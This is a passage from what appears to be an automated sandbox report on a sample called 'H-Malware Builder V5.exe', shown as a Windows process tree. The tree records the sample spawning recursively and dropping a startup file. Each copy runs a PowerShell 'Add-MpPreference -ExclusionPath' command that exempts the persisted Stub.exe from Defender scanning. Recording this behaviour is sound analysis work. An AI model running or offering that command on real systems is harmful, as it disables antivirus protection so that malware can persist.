                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                      14⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Drops startup file
                                                                                                                      PID:2064
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                        15⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        PID:3420
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          16⤵
                                                                                                                            PID:2176
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                          15⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Drops startup file
                                                                                                                          PID:2028
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                            16⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:4288
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              17⤵
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:3372
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                            16⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • Drops startup file
                                                                                                                            PID:2412
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                              17⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:4220
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                18⤵
                                                                                                                                  PID:4528
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                17⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Drops startup file
                                                                                                                                PID:444
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                  18⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:616
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    19⤵
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:3960
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                  18⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Drops startup file
                                                                                                                                  PID:216
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                    19⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:3740
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      20⤵
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:1404
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                    19⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Drops startup file
                                                                                                                                    PID:2656
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                      20⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:3900
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        21⤵
                                                                                                                                          PID:2108
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                        20⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Drops startup file
                                                                                                                                        PID:3148
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                          21⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:2560
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            22⤵
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:1980
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                          21⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Drops startup file
                                                                                                                                          PID:2228
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                            22⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            PID:2636
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              23⤵
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:2132
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                            22⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Drops startup file
                                                                                                                                            PID:4204
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                              23⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:1092
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                24⤵
                                                                                                                                                  PID:5016
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                23⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Drops startup file
                                                                                                                                                PID:3756
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                  24⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  PID:2516
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    25⤵
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:2428
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                  24⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  • Drops startup file
                                                                                                                                                  PID:676
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                    25⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:828
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      26⤵
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:1876
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                    25⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Drops startup file
                                                                                                                                                    PID:4956
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                      26⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:1544
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        27⤵
                                                                                                                                                          PID:1708
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                        26⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Drops startup file
                                                                                                                                                        PID:1904
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                          27⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:768
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            28⤵
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:1184
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                          27⤵
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          • Drops startup file
                                                                                                                                                          PID:1300
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                            28⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:3628
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              29⤵
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:2284
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                            28⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Drops startup file
                                                                                                                                                            PID:676
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                              29⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:264
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                30⤵
                                                                                                                                                                  PID:968
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                29⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Drops startup file
                                                                                                                                                                PID:5092
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                  30⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  PID:2484
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    31⤵
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:1592
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                  30⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Drops startup file
                                                                                                                                                                  PID:992
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                    31⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:2328
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      32⤵
                                                                                                                                                                        PID:2860
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                      31⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Drops startup file
                                                                                                                                                                      PID:2396
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                        32⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:3228
                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          33⤵
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:3444
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                        32⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Drops startup file
                                                                                                                                                                        PID:4448
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                          33⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:2660
                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            34⤵
                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                            PID:4680
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                          33⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Drops startup file
                                                                                                                                                                          PID:1596
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                            34⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:2064
                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              35⤵
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:804
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                            34⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Drops startup file
                                                                                                                                                                            PID:760
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                              35⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:2256
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                36⤵
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:460
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                              35⤵
                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                              • Drops startup file
                                                                                                                                                                              PID:1336
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                36⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:4396
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  37⤵
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:3788
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                36⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                PID:1168
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                  37⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:2660
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    38⤵
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:3652
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                  37⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:4444
                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 4444 -s 952
                                                                                                                                                                                    38⤵
                                                                                                                                                                                      PID:1268
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                            1⤵
                                                                                                              PID:3528
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:3724
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:3880
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4020
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                    1⤵
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    PID:3116
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                    1⤵
                                                                                                                      PID:4324
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                      1⤵
                                                                                                                        PID:528
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                        1⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:3784
                                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:4884
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                          1⤵
                                                                                                                            PID:3496
                                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                            1⤵
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:5068
                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                            1⤵
                                                                                                                              PID:3944
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                              1⤵
                                                                                                                                PID:2264
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:5072
                                                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                                                  1⤵
                                                                                                                                    PID:4456
                                                                                                                                  • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                    C:\Windows\System32\WaaSMedicAgent.exe 2e6f028206d161169c90af597cebdcbc WznuuBIP1UCGpng+tLKAbg.0.1.0.0.0
                                                                                                                                    1⤵
                                                                                                                                    • Sets service image path in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:5024
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      2⤵
                                                                                                                                        PID:2028
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3876
                                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                      1⤵
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Writes to the Master Boot Record (MBR)
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      PID:1536
                                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:772
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:2652
                                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          • Enumerates system info in registry
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          PID:4112
                                                                                                                                        • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                          C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          PID:3840
                                                                                                                                        • C:\Windows\system32\DllHost.exe
